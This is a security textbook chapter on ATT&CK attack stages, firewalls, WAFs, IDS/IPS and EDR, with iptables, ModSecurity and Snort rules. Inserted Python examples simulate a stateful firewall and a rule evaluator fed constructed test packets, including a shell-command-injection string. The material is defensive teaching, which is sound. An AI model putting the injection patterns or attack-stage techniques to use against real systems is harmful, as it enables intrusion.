There are a lot of techniques an attacker may use to get code executed. The attacker doesn't always have direct interactive access to the system, meaning they can't just double-click an icon or run a command-line program. They may rely on other techniques to get their code executed. There are a lot of ways of doing this, including using scheduled tasks, interprocess communication, system services, or operating system–specific techniques like using the Windows Management Instrumentation (WMI) system.

Persistence
With persistence, the attacker is trying to maintain consistent access to the system they have compromised. Systems reboot, sometimes they are powered down and later restarted, or sometimes users log out and then later log back in. This means programs that are executing will stop executing unless there is a way to get the program executing again. As the attacker is not sitting physically at the system, where they can do what they want, it's necessary for the attacker to have a means of getting remote access. This is often done through software the attacker has installed on the system. This software needs to execute, likely when the system boots. This is another case where system services are useful, though scheduled tasks are also useful as are system and user configurations through techniques like registry keys on Windows systems. Linux systems may use startup files such as .bashrc to get programs executed when a user logs in.

Privilege Escalation
With privilege escalation, attackers are trying to get the highest level of privileges they can. Most users don't have much in the way of access to their systems. They can get to their data and run programs, but they can't do useful things like install system services or extract system memory. This is where getting additional, elevated privileges is helpful. They may do this by injecting code into an existing process that already has administrative privileges. They may get a service to run at boot time, since the boot process automatically has elevated privileges. There are a lot of TTPs for privilege escalation since it's often a necessary step for an attacker to remain in the environment and gather data, like credentials, they need for further movement.

Defense Evasion
Attackers will need to get through a lot of different types of defense. Businesses certainly, though people as well, make use of software on systems to protect against these very attackers. This may be anti-malware or some other detection or prevention software. Attackers need to execute software in ways that won't be seen as malicious or suspicious. This may be using an old-school technique like using a rootkit, where the attacker may be provided remote access while also hiding all of the software being used from the user or other software looking for it. By far, this is the stage or category with the most TTPs. As an example, privilege escalation, an important phase in the attack process, has 12 techniques as of this writing, whereas defense evasion has 37.

Credential Access
Applications and systems typically require usernames and passwords to grant access. Attackers will want to try to get these credentials for use elsewhere. This may be through using a phishing attack by sending an email to a victim to get that person to provide username and password to the attacker. It may be from dumping credentials out of memory—from the operating system but also from applications that may be holding onto credentials. Attackers may also be able to use tactics to get the network to give up credentials by forcing authentication against network servers that can provide information to the attacker.

Discovery
Attackers are probably not going to be satisfied getting access to just your system. They will be looking for additional systems to get access to. They will want to look around at what you have access to, from systems to applications. They will be gathering a lot of detail to see what else they may be able to access within the target environment.

Lateral Movement
One of the reasons for doing discovery, in addition to seeing what data you may have access to that may be stolen for profit, is to determine what other systems may be attacked from your system. The attacker may make use of you and whatever your system has access to. The idea here is to compromise a lot of systems because more systems means more data that could be used or stolen. This may be through the use of existing credentials that have already been stolen. It may be remote exploitation of another system. It may be through the use of the email of the current victim to contact other potential victims.

Collection
Just as with discovery, collection is about gathering information. This may be information that could be used to attack other systems, or it could be information the attacker wants to steal (exfiltrate) for sale or use somewhere else. Once an attacker starts to collect data, this may be more visible than some of the other stages because they are leaving behind artifacts. After all, while they are collecting data, that data has to be stored somewhere. Because the attacker will be storing information temporarily ahead of exfiltration, files with strange names or other distinguishing characteristics may start showing up in places.

Command and Control
Keep in mind that attackers will want to maintain access to the systems for as long as possible. After all, if they have targeted your organization, you have something they want. It's likely you will continue to create this thing they want, whether it's intellectual property or customer information or usernames and passwords or credit card data. There's no point in wasting an opportunity by getting in and then leaving. This means they need to retain remote control over the entire environment. This stage is where they set up remote access to the systems in the environment. They may make use of commonly used protocols like the Hypertext Transfer Protocol (HTTP) and abuse it by embedding commands between the server they control and systems in your environment. They can also misuse other protocols like the Domain Name System (DNS) or the Internet Control Message Protocol (ICMP).

Exfiltration
Even if they continue to remain in the environment, they will want to get data they have collected out. This is where they exfiltrate the data. They, again, may make use of commonly used protocols since they are less likely to be suspected. The goal is always going to be evading detection as best as possible. However, even when they use commonly used protocols, you can detect the existence of the attacker by following the TTPs provided in the framework. If an attacker is sending data out using DNS, for instance, the message size is likely to be unusually large, so looking for those unusually large messages may let you catch the attacker in action.

Impact
This is where the attacker may decide to burn the house down, as it were. Some attackers will get what they want and then tear everything down as they leave. Others may do the same if they happen to be caught. As you are trying to get them out of your network and systems, they are tearing down as much as they can on the way out. This may be destruction of data, disk wiping, encryption of data (meaning ransomware attacks would fall into this category), denial-of-service attacks or other, similarly destructive actions.

The TTPs referenced in the matrix, which you can find on the MITRE website (https://attack.mitre.org/matrices/enterprise/), are regularly updated as more become known. Each TTP will have details associated with it, and MITRE will provide mitigation steps to prevent the attack from succeeding to begin with. You may also get advice on how to determine whether the attacker is making use of that TTP.

Security Technology

Invariably, security programs require some technology to implement. The number of technology solutions that may be used within an enterprise continues to grow. The best way to protect an enterprise is no longer about putting a firewall out in front of the network and considering yourself protected, even if that were ever the reality it was thought to be. Today, the attack vectors have changed a lot from what they were even a decade ago. Today's technical solutions are multilayered and aren't entirely focused on prevention. The assumption today is that prevention isn't possible if the expectation is that 100 percent of attacks will be repelled. As a result, detection is essential. Even detection solutions are multilayered because of the number of entry points into the network. Since detection is a passive effort, it needs to be followed by an active one. This can be incident response, and incident response may require automated collection of artifacts. All of these may require different technology solutions.

Firewalls

The firewall is a traditional security device in a network. Just saying that a firewall is in place, though, doesn't really explain what is happening because there are several types of firewalls running up the network stack. A firewall, in its original meaning, was a wall that kept fires contained. You implemented a firewall to keep fires contained to sections of a building. The same is true for the firewall in a car. The engine compartment is combustible, considering the fuel, oxygen, and electricity mixture there. Car manufacturers put a firewall in to contain any fire that may break out so it doesn't spread to the passenger compartment. The term was taken in the late 1980s to apply to nascent technology being used to protect networks.

Packet Filters

At a basic level, a firewall is a packet filter. Lots of devices offer the capability to filter packets, which is sometimes accomplished with access control lists. Routers and switches will often have the ability to perform packet filtering. This packet filtering is sometimes implemented in an access control list. Packet filters make determinations about the disposition of packets based on protocol, ports, and addresses. Ports and addresses can be filtered based on both source and destination. Packets can be dropped, meaning they don't get forwarded on to the destination, and there is also no response message sent to the originating system. They can also be rejected, meaning they won't be sent to the destination, but the rejecting device will send an Internet Control Message Protocol (ICMP) error message to the sender indicating that the destination is unreachable. This is not only the polite approach, since drops will incur retransmits; it's also generally considered the correct approach from the protocol standpoint. However, when it comes to system security, dropping messages may just make more sense. If messages just get dropped, it's unclear to the sending system what happened. The target system is essentially in a black hole.

Of course, packets can also be accepted. This can be done as a matter of rules, or it may be policy. Packet filters may have a policy that governs the behavior of the filter. This means there is a blanket rule that applies to everything unless exceptions are applied. A default deny policy, the most secure way to implement a packet filter, will drop everything that isn't explicitly allowed through. You may also have a default accept policy, which means everything is allowed through unless something is explicitly blocked.

You may have run across packet filters if you run Linux systems. While the host-based firewall included in most Linux distributions has other capabilities, it can also function as a basic packet filter. You can set a policy on different chains with the iptables firewall that is in the Linux kernel. As an example, the following lines show running iptables to set a default deny policy on the INPUT, OUTPUT, and FORWARD chains, which are collections of rules applied to specific message flows.

iptables Policy Settings

    iptables -P INPUT DROP
    iptables -P OUTPUT DROP
    iptables -P FORWARD DROP

Packet filtering is basic in its functionality. While these packet filters can be good for inbound traffic or even for keeping internal users from accessing specific ports or IP addresses, they are not good for more complex filtering, such as allowing inbound traffic that is a response to messages that originated on the inside of the network. For this, we need to keep track of those outbound connections, so we need something more than just a packet filter.

Stateful Filtering

Not long after the initial development of packet filters came the development of stateful firewalls. The first stateful firewall was developed in the late 1980s, just like packet filters were. These are firewall types we should know well because they have been around for about three decades at this point. This does not mean, though, that these stateful filters have been in use all that time.

A stateful firewall keeps track of the state of messages. This means the firewall has to have a state table, so it knows about all of the traffic flows passing through it. In the case of the Transmission Control Protocol (TCP), it's theoretically easier since the flags tell the story when it comes to the state of the traffic flow. A message that has just the SYN flag turned on is a NEW connection. It remains in this state until the three-way handshake has been completed. At that point, the state of the flow becomes ESTABLISHED. In some cases, you may have message flows that are RELATED. As an example, the File Transfer Protocol (FTP) will sometimes originate connections from the inside to the outside, meaning from the server to the client. In this case, the server-to-client connection for transferring the file is related to the control connection from the client to the server.

Even with TCP, the flags don't tell the whole story. After all, it would be easy enough to send messages with the correct flags set to get through a firewall that was only looking at the flags to determine what the state of the communication is. The User Datagram Protocol (UDP) has no state that is inherent to the protocol. This makes it impossible to look at any flags or headers to infer state. Stateful firewalls don't just look at the flags or headers, however. They keep track of all the communication streams so they aren't relying on the protocol. They watch messages coming in and going out and note them along with their directionality to determine what the state is. This means the firewall knows which end is the client and which end is the server.

When you have a stateful firewall, you not only can make decisions based on the ports and addresses, you can also add in the state of a connection. For example, you can see a pair of iptables rules in the following code listing that allow all connections that are NEW or ESTABLISHED into port 22, which is the Secure Shell (SSH) port. Additionally, connections that are established are allowed out on interface eth0. With a default deny policy, new connections won't be allowed out of the interface.

iptables State Rules

    iptables -A INPUT -i eth0 -p tcp --dport 22 -m state --state \
        NEW,ESTABLISHED -j ACCEPT
    iptables -A OUTPUT -o eth0 -p tcp --sport 22 -m state --state ESTABLISHED \
        -j ACCEPT

This gets us a little further in our capabilities to make decisions about what packets to allow or deny into our networks. While it doesn't seem like a lot, these capabilities provide a lot of potential for keeping bad people out.

Deep Packet Inspection

One of the biggest issues when it comes to firewalls is that they allow known services through. A firewall will allow connections to a web server through. This means attack traffic to the web server will just be let through the firewall. Attack traffic that uses the application against itself will set up connections just like any other client. From the standpoint of the packet filters and stateful filtering, the messages will pass through. Because of that, we need to go deeper. Just looking at the protocol headers is insufficient, because everything will look correct and legal in the headers. We need to start looking at higher layers of the stack.

A deep packet inspection (DPI) firewall looks beyond the headers and into the payload of the packet. With this approach, it's easier to identify malware and other inbound attacks. A DPI firewall would require signatures that it should look for in the packet to determine whether something is going to be malicious so it can block the traffic from coming into the network. To do this, the firewall has to parse the entire message before it can make any determinations. This means it has to have at least the entire packet, meaning any fragmentation at the IP layer has to arrive and be reassembled. In some cases, it may need the entire stream, whether that's UDP or TCP. This certainly means a little latency on the arrival of messages. Packet filters and stateful firewalls don't need to reassemble anything, assuming the entire header has arrived. Any message that doesn't have the entire set of IP
and TCP/UDP headers is likely a problem anyway, since that's well under 100 bytes. Fragmenting a message at under 100 bytes could be a result of malicious traffic, trying to fool a firewall or other security solution. They belong together.

Only looking at the headers is limiting, though, especially since so many attacks today come in over the higher-layer protocols. A DPI firewall provides the ability to inspect those higher-layer protocols. One consideration to keep in mind, though, is that encrypted traffic can't be inspected. The firewall won't have the key to decrypt the message to look at it. Any man-in-the-middle approach to encryption on the part of the firewall violates the end-to-end expectation of most encryption solutions and users. The headers, of course, aren't encrypted. If they were, no intermediate device would be able to determine where anything was going. This means packet filters and stateful firewalls are not impacted by encryption. DPI firewalls, though, are. This means that with the move to encryption over all web-based connections, DPI firewalls don't do a lot to protect the web server.

Application Layer Firewalls

There are application layer firewalls in addition to the DPI firewalls. While these firewalls also inspect the packet, they commonly are specific to a particular protocol. For example, in voice over IP (VoIP) networks, a device called a session border controller (SBC) can be used.
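As an added example, not code from the book, the following Python model ties together the Stateful Filtering and Deep Packet Inspection sections above: a conntrack-style state table that applies the policy of the iptables listing (NEW or ESTABLISHED traffic in to a service port, only ESTABLISHED traffic out from it, default deny), followed by a DPI stage that reassembles the client-to-server stream before matching signatures, so a signature split across two segments is still caught. The port set {22, 80}, the inspected port 80, the signature, and the addresses are assumptions made for this example; the state logic reproduces netfilter's behaviour of marking a flow ESTABLISHED as soon as a reply is seen, which is what lets the OUTPUT rule in the listing pass the server's reply.

```python
"""Toy stateful firewall with a DPI stage. Added example, not code from the book."""
from dataclasses import dataclass

NEW, ESTABLISHED = "NEW", "ESTABLISHED"


@dataclass(frozen=True)
class Packet:
    direction: str       # "in" = arrives on eth0, "out" = leaves on eth0
    src: str
    sport: int
    dst: str
    dport: int
    flags: frozenset     # subset of {"SYN", "ACK", "FIN", "RST"}
    payload: bytes = b""


@dataclass
class Flow:
    state: str = NEW
    stream: bytes = b""  # reassembled client-to-server bytes, used by the DPI stage


class StatefulFirewall:
    """Generalises the iptables listing: NEW or ESTABLISHED traffic may come in to a
    service port, only ESTABLISHED traffic may leave from it, everything else is denied.
    service_ports={22, 80} and inspect_ports={80} are assumptions for this example:
    SSH is encrypted, so only the cleartext port-80 flow is handed to the DPI stage."""

    def __init__(self, service_ports, inspect_ports, signatures):
        self.table = {}                     # conntrack-style state table
        self.service_ports = set(service_ports)
        self.inspect_ports = set(inspect_ports)
        self.signatures = list(signatures)

    @staticmethod
    def _key(p):
        """Canonical (client, server) key so both directions find the same entry."""
        a, b = (p.src, p.sport), (p.dst, p.dport)
        return (a, b) if p.direction == "in" else (b, a)

    def _classify(self, p):
        """Return the state this packet belongs to; None means no known flow (INVALID)."""
        flow = self.table.get(self._key(p))
        if flow is None:
            if p.direction == "in" and p.flags == frozenset({"SYN"}):
                self.table[self._key(p)] = Flow()   # first packet of a new connection
                return NEW
            return None
        if p.direction == "out" and flow.state == NEW:
            flow.state = ESTABLISHED   # as in netfilter: once a reply is seen, the
        return flow.state              # flow (including that reply) is ESTABLISHED

    def _inspect(self, flow, payload):
        """DPI stage: a signature may be split across segments, so scan the
        reassembled stream rather than the single packet."""
        flow.stream += payload
        return "DROP" if any(sig in flow.stream for sig in self.signatures) else "ACCEPT"

    def filter(self, p):
        state = self._classify(p)
        if state is None:
            return "DROP"
        if p.direction == "in" and p.dport in self.service_ports and state in (NEW, ESTABLISHED):
            verdict = "ACCEPT"
        elif p.direction == "out" and p.sport in self.service_ports and state == ESTABLISHED:
            verdict = "ACCEPT"
        else:
            verdict = "DROP"                # default deny policy
        if verdict == "ACCEPT" and p.direction == "in" and p.dport in self.inspect_ports and p.payload:
            verdict = self._inspect(self.table[self._key(p)], p.payload)
        return verdict


def demo():
    """Constructed traffic: a web session whose signature is split over two
    segments, an outbound connection attempt, and a packet with no SYN ever seen."""
    fw = StatefulFirewall(service_ports={22, 80}, inspect_ports={80},
                          signatures=[b"<script>"])   # constructed signature
    c, s = "203.0.113.5", "192.0.2.10"                # constructed client / server
    SYN, SYNACK, ACK = frozenset({"SYN"}), frozenset({"SYN", "ACK"}), frozenset({"ACK"})
    return [
        fw.filter(Packet("in", c, 40000, s, 80, SYN)),                          # NEW
        fw.filter(Packet("out", s, 80, c, 40000, SYNACK)),                      # reply -> ESTABLISHED
        fw.filter(Packet("in", c, 40000, s, 80, ACK)),
        fw.filter(Packet("in", c, 40000, s, 80, ACK, b"GET /?q=<scr")),          # half a signature
        fw.filter(Packet("in", c, 40000, s, 80, ACK, b"ipt> HTTP/1.1\r\n")),     # stream completes it
        fw.filter(Packet("out", s, 22, c, 40001, SYN)),                         # outbound NEW: denied
        fw.filter(Packet("in", c, 40002, s, 80, ACK, b"GET / HTTP/1.1\r\n")),    # no handshake seen
    ]


if __name__ == "__main__":
    print(demo())   # ['ACCEPT', 'ACCEPT', 'ACCEPT', 'ACCEPT', 'DROP', 'DROP', 'DROP']
```

The fourth packet passes because the DPI stage sees only half of the signature; the fifth is dropped because the stream, not the packet, is matched. That is the reassembly cost the text mentions: the firewall must hold the flow's bytes, which a packet filter never needs to do.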
This is a device that understands the VoIP protocols, commonly either H.323 or the Session Initiation Protocol (SIP). As such, it not only can make determinations about the validity of the messaging but also can open up dynamic pinholes to allow the Real-time Transport Protocol (RTP) media messages through, since they would be over different ports and protocols than the signaling messages would be. An SBC would be an example of an application layer firewall, since it has the capability of making decisions about allowing traffic through. It makes these decisions based on understanding the application layer protocol and common state flows of that protocol.

Another common application layer firewall would be a web application firewall (WAF). The WAF uses a set of rules to detect and block requests and responses. Given the number of web-based attacks, keeping up with these rules can be challenging. While there are several commercial WAFs, there is also ModSecurity, which is an open source module that can be used with Apache web servers. The rules can get complicated, and you can see an example in the following code listing.

mod-security Rule

```
SecRule RESPONSE_BODY "@rx (?i)(?:supplied argument is not a valid MySQL|Column count doesn't match value count at row|mysql_fetch_array\(\)|on MySQL result index|You have an error in your SQL syntax;|You have an error in your SQL syntax near|MySQL server version for the right syntax to use|\[MySQL\]\[ODBC|Column count doesn't match|Table '[^']+' doesn't exist|SQL syntax.*MySQL|Warning.*mysql_.*|valid MySQL result|MySqlClient\.)" \
    "capture,\
    setvar:'tx.msg=%{rule.msg}',\
    setvar:tx.outbound_anomaly_score=+%{tx.critical_anomaly_score},\
    setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},\
    setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},\
    setvar:tx.%{rule.id}-OWASP_CRS/LEAKAGE/ERRORS-%{matched_var_name}=%{tx.0}"
```

The rule you see looks in the response body for the message that is found after @rx. This indicates that what comes next is a regular expression. The regular expression describes the message the rule is looking to match on. If the rule matches, the regular expression match will be placed into the transaction variable collection because of the capture action. There will also be several variables that get placed into the transaction variable collection. In addition to capturing information, which can be logged and referred to later or be used for alerting, ModSecurity can block as an action. This will prevent the message from going past the WAF. What this means is that the WAF sits in front of the web server that is being protected. Sometimes, a WAF like ModSecurity is implemented on the edge of the network as a reverse proxy, so clients send messages to the reverse proxy, which handles the message on behalf of the server, parsing it for potential bad requests, before sending it on to the actual web server. Responses also pass through the reverse proxy.

These are just a couple of examples of application layer firewalls. They may also be called application layer gateways. Any device that can make decisions based on what is happening in the application layer protocol and then have the ability to drop the message, regardless of the application layer protocol, could be considered an application layer firewall.

Unified Threat Management

Sometimes a firewall alone isn't enough. Even in the case of application layer firewalls, you still need to protect the users. Users are often the most vulnerable point on your network, and they are regularly targets of social engineering and malware attacks. A unified threat management (UTM) device is one that consolidates a lot of security functions into a single system that may be placed at a single point in the network. This UTM would replace the firewall, intrusion detection, and intrusion protection devices as well as offering antivirus protection.

There are downsides to this type of approach. You now have a single point in your network where all of your security is handled. If this device fails for whatever reason, you have no backstops in place. If your firewall failed, for instance, you would still have intrusion detection systems to catch anything that got through, if that had happened. With UTM, you have one place, and it needs to work all the time and be configured correctly all the time.

Intrusion Detection Systems

There are two different types of intrusion detection systems (IDSs) that you can find. The first is a host-based IDS. A host-based IDS watches activity on a local system, such as changes to critical system files. It may also watch log files or audit other system behaviors. One of the challenges with a host-based IDS is that once an attacker is in a position to trigger a host-based IDS, they are on the system, which means they can become aware that the IDS is in place and make plans accordingly.

The second type is a network IDS. Where firewalls have the ability to block or allow packets in the network stream, a network IDS can take some of the same sorts of rules and generate log messages. A rule for an intrusion detection system can generally be based on any layer in the network stack. As long as you can create some sort of identification for the messages you want to log or alert on, you can write a rule for an IDS. As with the firewalls, there are a number of commercial options. There are also some open source options, one of the biggest names being Snort, which is currently owned by Cisco, but free access to the program and some community rules is still offered.

A network IDS watches all network traffic that passes by the network interface. This means that placement is important. There may be different approaches to placement, depending on the IDS product being used. One of these approaches is to place the IDS connected in parallel rather than in series at the very perimeter of the network so all network traffic coming in can be observed. Figure 3.3 shows a simplified diagram using this approach, with the IDS behind the firewall but not in the traffic flow directly. Traffic gets shunted to the IDS so it can detect without getting in the way or causing a network failure. Another approach is to place sensors in different parts of the network so you don't have a single device. This approach may be especially useful if you are also trying to look at potential insider attacks.

FIGURE 3.3 Network diagram showing IDS placement (diagram labels: Internet/WAN, Firewall, IDS, Internal Switch, Internal Network)

It used to be the case, many years ago, that IDS devices had problems keeping up with all of the traffic coming through a network, since the IDS device had to look at each packet and compare it against as many rules as were configured. This isn't the case any longer because processing power has increased considerably, as has overall bus throughput in systems. Even so, using multiple sensors across different parts of the network can allow for sharing the processing load.
We can take a look at Snort rules to see what an IDS can do and how it may work. Just as with WAF rules, it takes some time and effort to understand how to write rules, especially in cases where what you are trying to detect on is content in the packets. In the following code listing, you will see two Snort rules that demonstrate some of what Snort can do.

Snort Rules

```
alert tcp $EXTERNAL_NET any -> $SQL_SERVERS 7210 (msg:"SQL SAP MaxDB shell command injection attempt"; flow:to_server,established; content:"exec_sdbinfo"; fast_pattern:only; pcre:"/exec_sdbinfo\s+[\x26\x3b\x7c\x3e\x3c]/i"; metadata:policy balanced-ips drop, policy max-detect-ips drop, policy security-ips drop; reference:bugtraq,27206; reference:cve,2008-0244; classtype:attempted-admin; sid:13356; rev:7;)

alert tcp $EXTERNAL_NET any -> $HOME_NET 21064 (msg:"SQL Ingres Database uuid_from_char buffer overflow attempt"; flow:to_server,established; content:"uuid_from_char"; fast_pattern:only; pcre:"/uuid_from_char\s*?\(\s*?[\x22\x27][^\x22\x27]{37}/smi"; metadata:policy balanced-ips drop, policy max-detect-ips drop, policy security-ips drop; reference:bugtraq,24585; reference:cve,2007-3338; reference:url,supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp; reference:url,www.ngssoftware.com/advisories/high-risk-vulnerability-in-ingres-stack-overflow; classtype:attempted-admin; sid:12027; rev:11;)
```

Snort rules start with an action. You can alert, as is done in both of these rules, which generates an alert message to whatever is configured for output. In addition, however, you can log, drop, reject, and pass, along with some other actions. Some of these capabilities take us beyond traditional IDS functionality, but they are actions that Snort can take in rule configurations. After the action, you configure the details about the headers. This includes the protocol you want to alert on. In our case, we are alerting on a TCP message, so we need to specify not only a source and destination address but also a source and destination port. The -> (arrow) indicates the direction of the flow. Inside the parentheses are the details about the rule. First is the message to use in the log. After that, you will find details about the flow. Snort is aware of which side is the client and which is the server, so you can indicate which side the message should come from. While you've specified source and destination ports, this is a little more specification. The important part comes next, where we specify what the packet should contain to match on this rule. You will also see metadata, such as reference information. This reference information may include details about a vulnerability this is meant to alert on. Finally, rules will have a Snort identification number (SID). While this is configurable, there are conventions about numbers that should be used for user-defined rules. Values up to 999999 are reserved for the use of rules that come with the Snort distribution. You can also specify a revision number, so you can have some version control on the SIDs you use.

Commonly, you would use alert or log in the case of an IDS, since the intention of an IDS is just to detect events. The alert assumes that someone is paying attention to what the IDS is emitting and taking actions based on the alert and a subsequent investigation. There are, though, cases where you may want the IDS itself to do something with what it found.

Intrusion Prevention Systems

An intrusion prevention system (IPS) takes an IDS a step further. As noted earlier, Snort has actions including drop and reject. These are actions that are beyond the capability of Snort itself. Snort monitors network traffic and parses through it to identify packets that contain possibly malicious contents, as identified by the rules. To have Snort run as an IPS, it has to be placed inline, meaning it has to be a device in the path of traffic into and out of the network. Any IPS would have to be similarly configured in order to have the ability to block any network traffic. Figure 3.4 is a simplified network diagram showing the potential placement of an IPS.

FIGURE 3.4 Network diagram showing IPS placement (diagram labels: Internet/WAN, Firewall, IPS, Internal Switch, Internal Network)
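The ModSecurity rule and the two Snort rules above are both content-matching rules, so here is one added example (not from the book, nor from the Snort or ModSecurity projects) that serves both passages: it parses the two Snort rules exactly as printed, evaluates them against constructed packets, and applies the @rx expression from the ModSecurity rule with the capture and setvar semantics the text describes. The $HOME_NET and $SQL_SERVERS values, the packets, and the response body are assumptions; the flow facts (to_server, established) are supplied as inputs rather than derived from a stream tracker, and the content matcher handles only plain strings, not |hex| byte sequences.

```python
"""Minimal evaluator for the Snort rules and the ModSecurity rule shown above. Added example."""
import ipaddress
import re

# Constructed values for the rule variables (snort.conf defines these in a real deployment).
NET_VARS = {"$HOME_NET": [ipaddress.ip_network("10.0.0.0/8")],
            "$SQL_SERVERS": [ipaddress.ip_network("10.0.5.0/24")]}
PCRE_FLAGS = {"i": re.I, "s": re.S, "m": re.M}

# The two rules from the listing above, one per line.
RULES_TEXT = r'''
alert tcp $EXTERNAL_NET any -> $SQL_SERVERS 7210 (msg:"SQL SAP MaxDB shell command injection attempt"; flow:to_server,established; content:"exec_sdbinfo"; fast_pattern:only; pcre:"/exec_sdbinfo\s+[\x26\x3b\x7c\x3e\x3c]/i"; metadata:policy balanced-ips drop, policy max-detect-ips drop, policy security-ips drop; reference:bugtraq,27206; reference:cve,2008-0244; classtype:attempted-admin; sid:13356; rev:7;)
alert tcp $EXTERNAL_NET any -> $HOME_NET 21064 (msg:"SQL Ingres Database uuid_from_char buffer overflow attempt"; flow:to_server,established; content:"uuid_from_char"; fast_pattern:only; pcre:"/uuid_from_char\s*?\(\s*?[\x22\x27][^\x22\x27]{37}/smi"; metadata:policy balanced-ips drop, policy max-detect-ips drop, policy security-ips drop; reference:bugtraq,24585; reference:cve,2007-3338; reference:url,supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp; reference:url,www.ngssoftware.com/advisories/high-risk-vulnerability-in-ingres-stack-overflow; classtype:attempted-admin; sid:12027; rev:11;)
'''


def split_options(body):
    """Split the text inside (...) on ';' except inside double quotes."""
    parts, cur, quoted = [], [], False
    for ch in body:
        quoted ^= (ch == '"')
        if ch == ";" and not quoted:
            parts.append("".join(cur).strip())
            cur = []
        else:
            cur.append(ch)
    return [p for p in parts + ["".join(cur).strip()] if p]


def parse_rule(line):
    """Header: action proto src sport -> dst dport; options in parentheses."""
    header, body = line.split("(", 1)
    action, proto, src, sport, _, dst, dport = header.split()
    rule = {"action": action, "proto": proto, "src": src, "sport": sport,
            "dst": dst, "dport": dport, "reference": []}
    for opt in split_options(body.rsplit(")", 1)[0]):
        key, _, val = opt.partition(":")
        val = val.strip()
        if key == "content":                        # plain content only; |hex| bytes not handled
            rule["content"] = val.strip('"').encode()
        elif key == "pcre":                         # "/pattern/flags"
            pattern, _, flags = val.strip('"')[1:].rpartition("/")
            rule["pcre"] = re.compile(pattern.encode(), sum(PCRE_FLAGS[f] for f in flags))
        elif key == "flow":
            rule["flow"] = set(val.split(","))
        elif key == "reference":
            rule["reference"].append(val)
        elif key in ("msg", "classtype", "sid", "rev"):
            rule[key] = val.strip('"')
    return rule


def addr_matches(spec, ip):
    if spec == "any":
        return True
    if spec == "$EXTERNAL_NET":                     # conventionally defined as !$HOME_NET
        return not addr_matches("$HOME_NET", ip)
    return any(ipaddress.ip_address(ip) in net for net in NET_VARS[spec])


def evaluate(rules, pkt):
    """pkt carries the header fields, the payload, and the flow facts (to_server,
    established) that Snort's stream tracker would normally supply."""
    hits = []
    for r in rules:
        if r["proto"] != pkt["proto"]:
            continue
        if not (addr_matches(r["src"], pkt["src"]) and addr_matches(r["dst"], pkt["dst"])):
            continue
        if not all(s == "any" or int(s) == p for s, p in
                   ((r["sport"], pkt["sport"]), (r["dport"], pkt["dport"]))):
            continue
        if not r.get("flow", set()) <= {k for k in ("to_server", "established") if pkt[k]}:
            continue
        if r.get("content", b"") not in pkt["payload"]:   # cheap content check before the pcre
            continue
        if "pcre" in r and not r["pcre"].search(pkt["payload"]):
            continue
        hits.append((r["action"], int(r["sid"]), r["msg"]))
    return hits


# The regular expression that follows @rx in the ModSecurity rule above.
MYSQL_LEAK = re.compile(r"(?i)(?:supplied argument is not a valid MySQL|Column count doesn't match value count at row|mysql_fetch_array\(\)|on MySQL result index|You have an error in your SQL syntax;|You have an error in your SQL syntax near|MySQL server version for the right syntax to use|\[MySQL\]\[ODBC|Column count doesn't match|Table '[^']+' doesn't exist|SQL syntax.*MySQL|Warning.*mysql_.*|valid MySQL result|MySqlClient\.)")


def modsec_leakage_check(response_body, critical_anomaly_score=5):
    """Reproduce the rule's actions: 'capture' stores the match as tx.0 and each
    setvar adds the critical score (5 is the CRS default) to a running total."""
    tx = {"tx.outbound_anomaly_score": 0, "tx.sql_injection_score": 0, "tx.anomaly_score": 0}
    m = MYSQL_LEAK.search(response_body)
    if m:
        tx["tx.0"] = m.group(0)
        for var in ("tx.outbound_anomaly_score", "tx.sql_injection_score", "tx.anomaly_score"):
            tx[var] += critical_anomaly_score
    return tx


RULES = [parse_rule(l) for l in RULES_TEXT.strip().splitlines()]


def demo():
    """Constructed packets: one per rule, one that satisfies only the content match
    (the pcre fails), and one whose source lies inside $HOME_NET so $EXTERNAL_NET fails."""
    base = {"proto": "tcp", "src": "198.51.100.7", "sport": 51000, "to_server": True, "established": True}
    maxdb = dict(base, dst="10.0.5.20", dport=7210, payload=b"exec_sdbinfo ;")
    ingres = dict(base, dst="10.0.9.3", dport=21064, payload=b"uuid_from_char('" + b"A" * 40 + b"')")
    content_only = dict(maxdb, payload=b"exec_sdbinfo\n")
    internal = dict(maxdb, src="10.0.7.7")
    return [evaluate(RULES, p) for p in (maxdb, ingres, content_only, internal)]
```

The order of checks mirrors how Snort prunes work: header fields and flow state first, the cheap content match next, and the comparatively expensive pcre last. The content_only packet shows why the pcre is there at all: the bare string appears in plenty of legitimate traffic, and the regular expression is what narrows the rule to the pattern the reference describes.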
With the IPS in the flow, it can act like a firewall, making decisions about whether to accept or reject packets as they enter the network. The difference between an IPS and a firewall is that the "firewall rules" on an IPS would be dynamic. Rather than having large blanket rules blocking IP addresses wholesale, the IPS would make decisions based on the contents of the packet. The r

--- (output truncated; continued) ---

ule would be in place for the duration of the packet passing through the IPS, essentially a one-off. The rule may just exist to handle that one packet, or it may be in use for a longer period, but the rules are dynamic and temporary by nature. Also, while inline, the IPS can either choose to drop the message, meaning just discard it, or reject it with an appropriate message. This may be an ICMP destination unreachable message, for example.

Even with an IPS where potential attacks are blocked, the logs and alerts should be investigated. Not every message that matches an IDS/IPS rule will be a legitimate attack. In several cases of running a basic Snort installation with the community rules, I have run across alerts indicating bad SIP messages, when in fact the traffic was HTTP over port 80, not SIP. Rules are not infallible, so it is possible for rules to catch legitimate traffic, and if you are running an IPS, you may end up blocking messages from customers or partners.

One of the challenges of an IDS or IPS is the volume of logs they can create. This is a factor of the number of rules you have, how well they are written, and how much traffic you get into your network, as well as the placement of your sensors. Alerting is a significant challenge, and it can require a lot of work to fine-tune rules so your analysts, or whoever is looking at the alerts, don't become screen-blind, meaning they get so used to seeing the same alerts over and over that they end up missing one that is legitimate: a white rabbit in a field of white snow/noise. Fortunately, there are solutions that can help with that problem.

Endpoint Detection and Response

While you may be familiar with anti-malware software, used to detect the existence of viruses and other malicious software on a system, you may be less familiar with this. Endpoint detection and response (EDR) is a class of software that can perform a range of functions that are useful to a security operations staff. There are several commercial offerings in the EDR space, and each one of them may provide a different set of functionalities, though there will be a core set of functions they all provide.

